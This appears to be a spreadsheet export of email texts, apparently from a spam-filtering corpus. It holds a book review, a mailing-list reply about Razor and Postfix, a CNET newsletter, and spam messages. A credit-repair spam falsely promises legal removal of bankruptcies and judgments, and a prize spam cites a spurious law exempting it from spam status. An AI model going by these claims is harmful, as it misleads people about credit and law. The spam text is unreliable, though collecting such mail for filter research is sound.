 many respects, it does include some sharp observations of life in 
 Russia. "Usually with construction," he tells us, for instance, "you 
 have two choices: 1) you can do it quickly, or 2) you can do it right. 
 The Soviet construction worker . . . takes his time doing things wrong."
 Anyone who has spent time in Siberia knows that its inhabitants are a 
 breed apart. They disdain their compatriots in the country's Western 
 regions and pride themselves -- perhaps excessively -- on their courage, 
 strength and inner fortitude. Siberia, in fact, occupies a space in the 
 Russian national psyche similar to that of the Wild West in American 
 mythology. The efforts throughout the 16th and 17th centuries to settle 
 Siberia's vast expanse and exploit its natural resources still resonate 
 with Russians. So does the region's role as a convenient dumping ground 
 for criminals and political dissidents during the czarist centuries and 
 as home to the cruel network of gulags in Soviet times.
 Unfortunately, little of this rich brew of history and myth makes an 
 appearance in Siberia Bound. Neither do lots of other pertinent facts. 
 Russians often say that, in Russia, anything can happen -- and usually 
 does. So it's easy to believe that two young men could establish a 
 chocolate business on little more than hope, smarts and chutzpah. But 
 while Blakely describes establishing a cocoa-bean importing business 
 with his friend Sasha, we never learn how they met in the first place or 
 why he believes Sasha to be a trustworthy associate. The two of them 
 strike a deal to sell their beans to a local chocolate factory, yet we 
 find out virtually nothing about the chocolate the factory produces. Is 
 it tasty? Disgusting? Are we talking chocolate bars, chocolate truffles 
 or chocolate syrup? A few details would go a long way here.
 The author has the makings of a terrific story. But even though Siberia 
 Bound includes frequent humorous episodes, Blakely generally fails to 
 transform the pungent ingredients into a satisfying meal. The constant 
 descriptions of encounters and conversations ultimately differ little 
 from one another. People are forever winking, smirking and slapping one 
 another on the back. Slamming down shots of vodka and making sentimental 
 toasts to women and friendship play an inevitable role in any account of 
 Russian life, but reading about such occasions becomes tiresome after 
 the 20th or 30th repetition.
 Blakely is also given to facile comments that are meant to sound smart 
 but often fall flat. "Democracy and the free market, the best 
 institutions the West had to offer, stormed over the borders and ran 
 deep into Russia," he tells us. "But like all foreign armies throughout 
 history, they quickly were spread too thin and became diluted." And then 
 there's this summation of his time in Russia: "Those four years have 
 left me with a lifetime of rabid ambivalence to chew on until I've got 
 no teeth left."
 Blakely manages to include a few unpleasant -- and wholly unnecessary -- 
 laughs at the expense of Chinese workers and gays. And although I like 
 wordplay as much as the next guy, it's jarring when non-English-speaking 
 characters make puns in English. "In a pinch," says one character, a 
 chocolate factory director who warns Blakely not to store extra cocoa 
 beans on site, "I'm afraid we would probably take a pinch."
 Some of these faults wouldn't matter if Siberia Bound were a picaresque 
 novel or an account that didn't aspire to authenticity. But the effect 
 here is to undermine a reader's faith in the narrator's reliability and 
 to reduce most of the characters to the stock figures encountered in 
 dozens of other accounts of Russian life. So in the end, I believed the 
 broad contours of Blakely's story but found it hard to take seriously 
 many of the particulars. And his ultimate conclusion -- that capitalism, 
 material comfort and wealth do not bring happiness -- hardly qualifies 
 as a revelation. 
 David Tuller is a contributing writer at Salon.com and the author of 
 "Cracks in the Iron Closet: Travels in Gay and Lesbian Russia."
  2002 The Washington Post Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You've Won! Confirmation Number 567842
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;FitnessHeaven.com&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#99ccff"&gt;
 &lt;img src="http://track.mailoffers4you.com/tev.asp?eid=20148" 
 height="1" width="1"&gt;
 &lt;CENTER&gt;
 &lt;table bgcolor="#99ccff" border="0" cellpadding="0" cellspacing="0" 
 width="450" align="center"&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="100" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="60" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="20" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="50" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="40" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="80" 
 height="1" border="0"&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src="http://64.251.20.8/20148/spacer.gif" width="100" 
 height="1" border="0"&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td colspan="7"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r2_c2" src="http://64.251.20.8/20148/fhyd02b_r2_c2.gif" 
 width="450" height="105" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r3_c2" src="http://64.251.20.8/20148/fhyd02b_r3_c2.jpg" 
 width="100" height="125" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td colspan="2"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r3_c3" src="http://64.251.20.8/20148/fhyd02b_r3_c3.jpg" 
 width="80" height="125" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td colspan="2"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r3_c5" src="http://64.251.20.8/20148/fhyd02b_r3_c5.jpg" 
 width="90" height="125" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r3_c7" src="http://64.251.20.8/20148/fhyd02b_r3_c7.jpg" 
 width="80" height="125" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r3_c8" src="http://64.251.20.8/20148/fhyd02b_r3_c8.jpg" 
 width="100" height="125" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td colspan="4"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r4_c2" src="http://64.251.20.8/20148/fhyd02b_r4_c2.gif" 
 width="230" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td colspan="3"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r4_c6" src="http://64.251.20.8/20148/fhyd02b_r4_c6.gif" 
 width="220" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td rowspan="2" colspan="2"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r5_c2" src="http://64.251.20.8/20148/fhyd02b_r5_c2.gif" 
 width="160" height="130" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
      &lt;td colspan="5"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r5_c4" src="http://64.251.20.8/20148/fhyd02b_r5_c4.gif" 
 width="290" height="50" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td colspan="5"&gt;&lt;a 
 href="http://track.mailoffers4you.com/clicktrack.asp?eid=20148&amp;url=http%3A%2F%2Fwww%2Efitnessheaven%2Ecom%2Fsignup%2F%3Fpc%3Dfhyd02b%26tid%3DNaviant6"&gt;&lt;img 
 name="fhyd02b_r6_c4" src="http://64.251.20.8/20148/fhyd02b_r6_c4.gif" 
 width="290" height="80" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;&lt;HR WIDTH="500"&gt;&lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
     &lt;TR&gt;
       &lt;TD WIDTH="100%"&gt;
         &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;You are receiving this email
         as a subscriber to the DealsUWant mailing list. To remove yourself
         from this and related email lists click here:&lt;BR&gt;
         &lt;a href="http://remove.mailoffers4you.com"&gt;UNSUBSCRIBE MY 
 EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
         &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;&lt;BR&gt;
         Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
         301, Paragraph(a)(2)of S. 1618, a letter cannot be consideyellow
         Spam if the &lt;BR&gt;sender includes contact information and a method
         of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
         &lt;BR&gt;
         &lt;BR&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Razor: shall I use it with AMaViS or with
</t>
  </si>
  <si>
    <t xml:space="preserve">Depends on how you want to use it.
 The default setup of running it from procmail works just fine, as long as 
 you remember to go into your postfix/main.cf file, and tell it to use 
 procmail instead of the internal delivery agent.
 On Thu, 19 Sep 2002, Boniforti Flavio wrote:
 &gt; How do I intergrate razor into my postfix setup? Will it have to
 &gt; interact with AMaViS or with SpamAssassin?
 &gt; 
 &gt; Thank you
 &gt; 
 &gt; Boniforti Flavio
 &gt; Informa Srl
 &gt; Via 42 Martiri, 165
 &gt; 28924 Verbania (VB)
 &gt; Tel +39 0323 586216
 &gt; Fax +39 0323 586672
 &gt; http://www.co-ver.it/informa
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Software to rebuild your credit
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Have you checked your personal credit reports recently?
 If you are planning making any major purchase like purchasing a Home or 
 newcar or getting a new job or even a promotion, Please....read on!
 You need to have a GOOD to EXCELLENT credit rating.  If you do already, 
 that's important, but if you know your credit is less than perfect, you need 
 to get those negative remarks REMOVED, LEGALLY and quickly.
 How?  It's easier than you think.
 With NuCredit Software YOU can clear any negatives already on your 
 credit reports, This requires NO experience OR special skills from you to use our 
 program.  
 This is how we can help:
 Getting "Excellent Credit" has never been easier at
 http://nuew2.dyn.ee
 For the first time ever, we have simplified this process and made it 
 easy for thousands just like you that are looking for a safe and legal and 
 easy way to remove "bad credit" permanently, once and for all!. NuCredit 
 can remove Judgements, Bankruptcies, Tax liens and any other
 negative ratings, in fact, ANYTHING that is reported on your credit.
 "We" will not clear your negative credit, but "you" can, and easily 
 too. You are not going to spend hundreds or even thousands of dollars to do 
 it,or depend on someone you don't even know to take action. 
 If you can send an email, you can operate our software. It's just that 
 simple.
 This "Fast and easy-to-use" program is called, NuCredit. 
 Here is a brief description:
 The easiest and most effective credit program available today. 
 NuCredit is designed to improve and remove negative items on
 your personal credit reports at home or the office quickly and 
 effectively. This is your first step to achieving financial independence. 
 NuCredit does it all "Step by Step"...Each easy-to-understand step 
 is designed to remove negative credit remarks on each of the major 
 credit bureau files, legally! Never before, has it been easier to 
 remove negative credit just like the professionals. 
 This program is the complete route to getting, using, and managing your 
 credit reports wisely even if you're unskilled in credit or computers. 
 10 minutes a month is all you need to: 
 Remove negative items from each credit report: 
 TRW (Experian), TransUnion, CBI/Equifax 
 Communicate with the credit bureaus without fear or reprisal. 
 Review your credit reports on a consistent cycle (every 30 days!) 
 Manage your own credit reports easily. 
 Now "you" have control over your reports. 
 Re-establish good credit, Fast and easy!" 
 Please go to:
 http://nuew2.dyn.ee
 Let's get started today!. Don't let another minute pass.
 To be removed click below
 http://nuew2.dyn.ee/remove.htm
 Have you checked your personal credit reports recently?
 If you are planning making any major purchase like purchasing a Home or 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Jobs touts OS X, iPods, iMac&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tkvp0A7fZsihsBSWgp7dR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=9a-b6_GQTMBaJXgw0pFigi7yr9FKgsR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqyARhu8pydDX7NdmUVSZR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvkFp-EnkHF6q-jPexAdR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUkIdq6die23s1N87hJcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkh4WR8dj0QzbMuLbLadRR"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17, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Jobs touts OS X, iPods, iMac&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Scient files for Chapter 11 &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Yahoo Mail puts words in your mouth&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Unisys splits Intel server line &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft sweetens Mac Office offer &lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 New chip may portend ATI comeback&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;Why free downloads help, not hurt&lt;/b&gt;&lt;br&gt;
 Recording artist Janis Ian argues that file swapping could actually help the industry, and its musicians.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWUBUR898BbBL7kOi_dR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Jobs touts OS X, iPods, iMac&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 NEW YORK--Apple Computer CEO Steve Jobs on Wednesday defended the company's switch to the Mac OS X operating system and unveiled new iPod digital-audio players and a new flat-panel iMac.
 Jobs used his keynote speech at the Macworld trade show here to make a flurry of other announcements as well, such as details about new syncing software, the next update to OS X and the end of free iTools.
 The most dramatic announcement focused on iPod. The new players include ones built specifically for computers that use Microsoft's Windows operating system.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 8:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXwPvzM19KMZ2Fz8IR7XcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Scient files for Chapter 11 &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Internet consulting firm Scient has filed for Chapter 11 bankruptcy and agreed to sell certain assets to a professional services firm.
 The deal calls for Salt Lake City-based SBI to hire some of Scient's employees and to provide up to $4.9 million in financing, pending completion of the asset acquisition.
 Scient has been struggling for some time now. Once a dot-com darling, the company recently approved a 1-for-20 reverse stock split.
 The company and SBI said they expect the bankruptcy court to approve the deal, adding that financing "will allow Scient to continue to deliver services to its clients without interruption until court approval of SBI's acquisition is received."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 8:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89w27W-6ktQ3DlPfP8NRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Yahoo Mail puts words in your mouth&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 What does Yahoo Mail have against mocha?
 That's what users of the company's free e-mail service may be wondering if they try to send a message using the word "mocha" and discover that while in transit, "mocha" mysteriously changes to "espresso."
 To protect users from malicious code, Yahoo uses an automated filter to swap out a handful of words such as "mocha" that pertain to Web code known as JavaScript.
 The reason is that e-mail sent in a form known as "Web enhanced" can contain JavaScript instructions that can run programs on the recipient's PC. JavaScript is a Web language that can issue commands such as telling the browser to open up other windows or to prompt a service to change a password, for example.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 4:00 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW1Yw_em9Z5VKc-3P0BlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Unisys splits Intel server line &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Unisys, a specialist in high-end servers, is coming out with a new lower-cost line of Intel-based servers as it gears up to promote the Itanium 2 chip.
 Unisys' new Aries servers accommodate as many as 16 Itanium 2 or Xeon processors and cost between $75,000 and $300,000, said Mark Fevertson, Unisys' vice president of server marketing. It joins the Orion line, which can use up to 32 Xeon or Itanium 2 processors and has been on sale for about two years at a cost between $140,000 and $700,000.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 10:40 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHOQrH9wKYjKHbtbXYzH4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Microsoft sweetens Mac Office offer &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 With sales of its Office suite for Mac OS X falling short of projections, Microsoft plans on Wednesday to announce a rebate for those who buy the software bundle when they pick up a new Mac.
 The promotion, which runs through Sept. 30, entails a $50 mail-in rebate for people buying a new Mac and upgrading to Office v. X, and $100 for those buying a Mac and the full version of the software. Microsoft is also offering two new pieces of downloadable software: one that lets Palm handhelds synchronize directly with Office v. X and another that lets the Macintosh view programs running on a Windows PC or server.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 3:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0tYt1xj7Bc1bJBykEmeR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;New chip may portend ATI comeback&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 ATI, once the leader in graphics chips, will launch its comeback bid this week with a new chip that experts say could put the company back in front in terms of performance.
 The Markham, Ontario-based company on Thursday will unveil the details of the Radeon 9700, a desktop graphics chip based on a new architecture that will provide greater realism when it comes to 3D images, according to sources.
 The fastest versions of the new chips will offer considerably higher performance than Nvidia's current GeForce4 roster, giving ATI the edge with gamers as well as PC makers, analysts said. And even after Nvidia--which began to chip away at ATI's leading spot in graphics in 1999--comes out with its GeForce 5 in a few months, the competition between the two will remain close.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK14an0Lhy6gJLkjCXMZHsR"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&lt;b&gt;Truth is in the iMac of the beholder&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 It's silly of Apple to try to squelch Internet rumors about its next moves. Jobs &amp; Co. should rejoice that fans care enough to gossip.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za61wn7d4CW5CH7esbKR9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;eBags carries it off&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The dot-com boom's big spenders couldn't buy success, but this online luggage vendor survived by making frugality its watchword.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 17, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSOFz-NlQhaIHsSzky0uR"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href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRhaBmyrgVnxXFZcIuIsR"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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhmdkvcRmBekeVktk2ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2Fgaahem1kOqFb2GVaGdR"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href="http://clickthru.online.com/Click?q=01-9oXDI2jHs5W3jeUvurMPGPxZ6RcR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFDOFy6fgDblRuaBDxRURR"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href="http://clickthru.online.com/Click?q=2c-DatOIc0DRUKa2G5c-r7MBvWpjudR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeD2-LLQU5CfCkxHB0FrR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvJUaBZ2rctPQDwwaMCiR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAd9O5E80ywQ-4d0P6lR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYe82T0BoaDkjVsTLZ89R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfeV4tPKr1yZeU_u_KnuR"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src="http://news.cnet.com/i/ne/bb/2002/07/0717_jobs1.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_twy_mRWLXZBXqONOVsR" &gt;Jobs presents iMac's new face&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 In his Macworld 2002 keynote, Apple CEO Steve Jobs shows off a new 17-inch flat-panel iMac.&lt;br&gt;
